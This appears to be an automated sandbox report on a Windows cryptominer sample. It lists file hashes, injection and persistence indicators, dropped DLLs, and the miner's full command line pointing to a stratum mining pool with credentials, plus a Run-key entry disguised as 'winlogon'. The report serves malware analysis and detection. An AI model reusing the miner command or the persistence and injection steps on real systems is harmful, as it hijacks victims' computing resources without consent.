Analysis
-
max time kernel
94s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
20-05-2022 03:28
Static task
static1
Behavioral task
behavioral1
Sample
a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe
Resource
win10v2004-20220414-en
General
-
Target
a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe
-
Size
5.5MB
-
MD5
59d3d2406da9ec9591a7f5064375603c
-
SHA1
a43f3d2ebfdf2700edec93c1aa3e8d7e529a0294
-
SHA256
a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d
-
SHA512
233c715a750e159deb27c1e0d57856d47f8e7ab118933749bf8167abe3f3611fc094bf53584e708e5b34b224435f71ffcf3c85b85f7a00aeb917968b4e5dfad5
Malware Config
Signatures
-
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
Executes dropped EXE 2 IoCs
Processes:
winlogon.exewinlogon.exepid process 2132 winlogon.exe 396 winlogon.exe -
Loads dropped DLL 12 IoCs
Processes:
winlogon.exewinlogon.exepid process 2132 winlogon.exe 396 winlogon.exe 2132 winlogon.exe 396 winlogon.exe 396 winlogon.exe 2132 winlogon.exe 2132 winlogon.exe 396 winlogon.exe 2132 winlogon.exe 396 winlogon.exe 396 winlogon.exe 2132 winlogon.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows\CurrentVersion\Run a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Users\\Admin\\AppData\\Roaming\\winlogon\\winlogonservice.exe\" " a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exedescription pid process target process PID 1872 set thread context of 2132 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 set thread context of 396 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exepid process 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exedescription pid process target process PID 1872 wrote to memory of 2132 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 wrote to memory of 2132 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 wrote to memory of 2132 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 wrote to memory of 2132 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 wrote to memory of 2132 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 wrote to memory of 2132 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 wrote to memory of 2132 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 wrote to memory of 2132 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 wrote to memory of 2132 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 wrote to memory of 2132 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 wrote to memory of 2132 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 wrote to memory of 2132 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 wrote to memory of 2132 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 wrote to memory of 396 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 wrote to memory of 396 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 wrote to memory of 396 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 wrote to memory of 396 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 wrote to memory of 396 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 wrote to memory of 396 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 wrote to memory of 396 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 wrote to memory of 396 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 wrote to memory of 396 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 wrote to memory of 396 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 wrote to memory of 396 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe PID 1872 wrote to memory of 396 1872 a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe winlogon.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe"C:\Users\Admin\AppData\Local\Temp\a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe"1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\winlogon\winlogon.exe--scrypt -o stratum+tcp://hash-to-coins.com:3333 -u no3kah.trol -p trol2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\winlogon\winlogon.exe--scrypt -o stratum+tcp://hash-to-coins.com:3333 -u no3kah.trol -p trol2⤵
- Executes dropped EXE
- Loads dropped DLL
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\winlogon\LIBEAY32.dllFilesize
1.6MB
MD59462cb83718ccab3c744f0f5561a289d
SHA1d716496ea6b6354e2cab9337e6b631603bba80e5
SHA256f08009f941680657077fff1c8d58fac8affa2216b3a478312ac48948c228c73a
SHA5129b54abd361f36c89884973a86d51b251db06738bb033e7afba55839b4b9624b30836df41cd4d69e715317bacd86fd546a0256cff858aa90b69669c3b0e834beb
-
C:\Users\Admin\AppData\Roaming\winlogon\OpenCL.dllFilesize
56KB
MD5c4f271897205db916f46ce88f910eb5b
SHA16223d0d1146c8c3624bdb0db7576c5e915ead8a7
SHA2569ae4be443b4c1bca28f3f5722756ef12a8c480c73d55020b253264dce801b772
SHA512cc2c64bb37c2ccfe675031ddc962165fa313970f1f6c9721b3eab7110efde2fd7ab56720c6c0b83f067c85bc446ded3701d8777f0adcae835e36d20ca58d7622
-
C:\Users\Admin\AppData\Roaming\winlogon\OpenCL.dllFilesize
56KB
MD5c4f271897205db916f46ce88f910eb5b
SHA16223d0d1146c8c3624bdb0db7576c5e915ead8a7
SHA2569ae4be443b4c1bca28f3f5722756ef12a8c480c73d55020b253264dce801b772
SHA512cc2c64bb37c2ccfe675031ddc962165fa313970f1f6c9721b3eab7110efde2fd7ab56720c6c0b83f067c85bc446ded3701d8777f0adcae835e36d20ca58d7622
-
C:\Users\Admin\AppData\Roaming\winlogon\SSLEAY32.dllFilesize
356KB
MD55935940918fa77c777fcd0475149a217
SHA18795761c41b59e6352e0f24cb385f88076a08491
SHA256ed0b0f0d40c902703e212279f99c6dcf403eb75eba4abb058cb39129d09a6467
SHA51244c076642b531e5e39280f52bab229795f25f87defb523594750313d1b8192124430606d1d701ac56224de26eed7c76d2347780be29c94c119822a44939c6d16
-
C:\Users\Admin\AppData\Roaming\winlogon\libcurl-4.dllFilesize
525KB
MD548131a7c1cd5bce34da3eda489a81158
SHA19e9b021b245464c81620ec1af765198471b538c7
SHA256a899458036e4cbf1b13f755fb1c65b6a63e537ee72aefa569a9dea590e8d3ff6
SHA5126ddced7c460901ff440247001bae266e88286389d26aba09f3afbd9d9e66d89a1c6251c145da622afda66f43bcd4e9e6acfbc695513fd704ba23c26160c53d11
-
C:\Users\Admin\AppData\Roaming\winlogon\libcurl-4.dllFilesize
525KB
MD548131a7c1cd5bce34da3eda489a81158
SHA19e9b021b245464c81620ec1af765198471b538c7
SHA256a899458036e4cbf1b13f755fb1c65b6a63e537ee72aefa569a9dea590e8d3ff6
SHA5126ddced7c460901ff440247001bae266e88286389d26aba09f3afbd9d9e66d89a1c6251c145da622afda66f43bcd4e9e6acfbc695513fd704ba23c26160c53d11
-
C:\Users\Admin\AppData\Roaming\winlogon\libcurl-4.dllFilesize
525KB
MD548131a7c1cd5bce34da3eda489a81158
SHA19e9b021b245464c81620ec1af765198471b538c7
SHA256a899458036e4cbf1b13f755fb1c65b6a63e537ee72aefa569a9dea590e8d3ff6
SHA5126ddced7c460901ff440247001bae266e88286389d26aba09f3afbd9d9e66d89a1c6251c145da622afda66f43bcd4e9e6acfbc695513fd704ba23c26160c53d11
-
C:\Users\Admin\AppData\Roaming\winlogon\libeay32.dllFilesize
1.6MB
MD59462cb83718ccab3c744f0f5561a289d
SHA1d716496ea6b6354e2cab9337e6b631603bba80e5
SHA256f08009f941680657077fff1c8d58fac8affa2216b3a478312ac48948c228c73a
SHA5129b54abd361f36c89884973a86d51b251db06738bb033e7afba55839b4b9624b30836df41cd4d69e715317bacd86fd546a0256cff858aa90b69669c3b0e834beb
-
C:\Users\Admin\AppData\Roaming\winlogon\libeay32.dllFilesize
1.6MB
MD59462cb83718ccab3c744f0f5561a289d
SHA1d716496ea6b6354e2cab9337e6b631603bba80e5
SHA256f08009f941680657077fff1c8d58fac8affa2216b3a478312ac48948c228c73a
SHA5129b54abd361f36c89884973a86d51b251db06738bb033e7afba55839b4b9624b30836df41cd4d69e715317bacd86fd546a0256cff858aa90b69669c3b0e834beb
-
C:\Users\Admin\AppData\Roaming\winlogon\libeay32.dllFilesize
1.6MB
MD59462cb83718ccab3c744f0f5561a289d
SHA1d716496ea6b6354e2cab9337e6b631603bba80e5
SHA256f08009f941680657077fff1c8d58fac8affa2216b3a478312ac48948c228c73a
SHA5129b54abd361f36c89884973a86d51b251db06738bb033e7afba55839b4b9624b30836df41cd4d69e715317bacd86fd546a0256cff858aa90b69669c3b0e834beb
-
C:\Users\Admin\AppData\Roaming\winlogon\libeay32.dllFilesize
1.6MB
MD59462cb83718ccab3c744f0f5561a289d
SHA1d716496ea6b6354e2cab9337e6b631603bba80e5
SHA256f08009f941680657077fff1c8d58fac8affa2216b3a478312ac48948c228c73a
SHA5129b54abd361f36c89884973a86d51b251db06738bb033e7afba55839b4b9624b30836df41cd4d69e715317bacd86fd546a0256cff858aa90b69669c3b0e834beb
-
C:\Users\Admin\AppData\Roaming\winlogon\libwinpthread-1.dllFilesize
70KB
MD57a2008c80f306eed0b8152b584e8153c
SHA1b25f02add9743fff215523ec4c935c5526522243
SHA256dd04524dd4220a868c6e35183f6284bbf7cd1fa9273d85636239e0fc3ac245e4
SHA51202f23b01954e53a3c2c2a4940150abe2b0952b3d2b00b7cc93bd179c59eaf39d11ff2dd53b5a9928a4dd0fe52afb6b8162d794c09c141e9e046b5a674f428c2c
-
C:\Users\Admin\AppData\Roaming\winlogon\libwinpthread-1.dllFilesize
70KB
MD57a2008c80f306eed0b8152b584e8153c
SHA1b25f02add9743fff215523ec4c935c5526522243
SHA256dd04524dd4220a868c6e35183f6284bbf7cd1fa9273d85636239e0fc3ac245e4
SHA51202f23b01954e53a3c2c2a4940150abe2b0952b3d2b00b7cc93bd179c59eaf39d11ff2dd53b5a9928a4dd0fe52afb6b8162d794c09c141e9e046b5a674f428c2c
-
C:\Users\Admin\AppData\Roaming\winlogon\ssleay32.dllFilesize
356KB
MD55935940918fa77c777fcd0475149a217
SHA18795761c41b59e6352e0f24cb385f88076a08491
SHA256ed0b0f0d40c902703e212279f99c6dcf403eb75eba4abb058cb39129d09a6467
SHA51244c076642b531e5e39280f52bab229795f25f87defb523594750313d1b8192124430606d1d701ac56224de26eed7c76d2347780be29c94c119822a44939c6d16
-
C:\Users\Admin\AppData\Roaming\winlogon\ssleay32.dllFilesize
356KB
MD55935940918fa77c777fcd0475149a217
SHA18795761c41b59e6352e0f24cb385f88076a08491
SHA256ed0b0f0d40c902703e212279f99c6dcf403eb75eba4abb058cb39129d09a6467
SHA51244c076642b531e5e39280f52bab229795f25f87defb523594750313d1b8192124430606d1d701ac56224de26eed7c76d2347780be29c94c119822a44939c6d16
-
C:\Users\Admin\AppData\Roaming\winlogon\winlogon.exeFilesize
30KB
MD57257652bada64cfcfb81fc671b8b6c67
SHA1c4db7ba1fa0ae7d9b558f25670a61f0d6144c420
SHA256a25a414c34475199a1a75408d02e973f2d02c8c711828d942243278786b452be
SHA512c438383287b204f9ca41d819edbba7bbf6cfd3476a39031e66531f9c4f2d52ff53201bad54f0c1af6f5d957fba5bf5f0f79f992ea4d4727ef8a5444bddda7155
-
C:\Users\Admin\AppData\Roaming\winlogon\winlogon.exeFilesize
30KB
MD57257652bada64cfcfb81fc671b8b6c67
SHA1c4db7ba1fa0ae7d9b558f25670a61f0d6144c420
SHA256a25a414c34475199a1a75408d02e973f2d02c8c711828d942243278786b452be
SHA512c438383287b204f9ca41d819edbba7bbf6cfd3476a39031e66531f9c4f2d52ff53201bad54f0c1af6f5d957fba5bf5f0f79f992ea4d4727ef8a5444bddda7155
-
C:\Users\Admin\AppData\Roaming\winlogon\winlogon.exeFilesize
30KB
MD57257652bada64cfcfb81fc671b8b6c67
SHA1c4db7ba1fa0ae7d9b558f25670a61f0d6144c420
SHA256a25a414c34475199a1a75408d02e973f2d02c8c711828d942243278786b452be
SHA512c438383287b204f9ca41d819edbba7bbf6cfd3476a39031e66531f9c4f2d52ff53201bad54f0c1af6f5d957fba5bf5f0f79f992ea4d4727ef8a5444bddda7155
-
C:\Users\Admin\AppData\Roaming\winlogon\zlib1.dllFilesize
83KB
MD515d6af5c659fe2d9524dd9a90a674d02
SHA133d2f481b71a82bf4051296957ff327e50bfb033
SHA256aad5344650f7ab0a0a396f518f7ef827b8773748220d9e48d28fe4bc7888eb0c
SHA512776c4ace3f6beb64ebface2bf513d24b56484278feca7c5a474da9765b201202cd503f0bfe100c84c28dfda7d2e5edb14c950b22b6c79512a34f3418de544377
-
C:\Users\Admin\AppData\Roaming\winlogon\zlib1.dllFilesize
83KB
MD515d6af5c659fe2d9524dd9a90a674d02
SHA133d2f481b71a82bf4051296957ff327e50bfb033
SHA256aad5344650f7ab0a0a396f518f7ef827b8773748220d9e48d28fe4bc7888eb0c
SHA512776c4ace3f6beb64ebface2bf513d24b56484278feca7c5a474da9765b201202cd503f0bfe100c84c28dfda7d2e5edb14c950b22b6c79512a34f3418de544377
-
C:\Users\Admin\AppData\Roaming\winlogon\zlib1.dllFilesize
83KB
MD515d6af5c659fe2d9524dd9a90a674d02
SHA133d2f481b71a82bf4051296957ff327e50bfb033
SHA256aad5344650f7ab0a0a396f518f7ef827b8773748220d9e48d28fe4bc7888eb0c
SHA512776c4ace3f6beb64ebface2bf513d24b56484278feca7c5a474da9765b201202cd503f0bfe100c84c28dfda7d2e5edb14c950b22b6c79512a34f3418de544377
-
memory/396-133-0x0000000000000000-mapping.dmp
-
memory/396-149-0x0000000000400000-0x0000000000437000-memory.dmpFilesize
220KB
-
memory/396-134-0x0000000000400000-0x0000000000437000-memory.dmpFilesize
220KB
-
memory/396-160-0x0000000000400000-0x0000000000437000-memory.dmpFilesize
220KB
-
memory/2132-145-0x0000000000400000-0x000000000051E000-memory.dmpFilesize
1.1MB
-
memory/2132-130-0x0000000000000000-mapping.dmp
-
memory/2132-131-0x0000000000400000-0x000000000051E000-memory.dmpFilesize
1.1MB
-
memory/2132-159-0x0000000000400000-0x000000000051E000-memory.dmpFilesize
1.1MB